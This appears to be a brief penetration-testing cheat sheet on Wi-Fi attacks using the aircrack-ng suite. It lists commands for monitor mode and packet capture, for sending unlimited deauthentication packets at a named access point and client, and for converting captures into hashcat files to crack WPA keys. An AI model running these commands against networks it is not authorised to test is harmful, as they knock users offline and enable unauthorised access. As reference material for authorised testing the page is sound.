+++
title = "Wifi"
description = ""
categories = []
tags = []
weight = 100
+++

## Wifi

### airodump-ng

> A wireless packet capture tool for aircrack-ng

```bash
# start monitor more for wifi0
airmon-ng start wifi0

# start monitor all channels
airodump-ng wifi0mon

# specify channel and bssid
airodump-ng --channel 1 --bssid F0:84:2F:CC:F5:C9 -i wifi0mon

# specify channel and bssid and write to file
airodump-ng -w example.pcap --channel 1 --bssid F0:84:2F:CC:F5:C9 -i wifi0mon
```

### aireplay

> Inject packets into a wireless network to generate traffic

```bash
# send deauth packets
aireplay-ng --deauth 0 -a F0:84:2F:AC:A5:C3 -c 78:E4:08:93:56:13 wifi0mon
```

### aircrack-ng

> A 802.11 WEP / WPA-PSK key cracker

```bash
# create a file for hashcat to crack
aircrack-ng example.pcap -J example.hcat
```
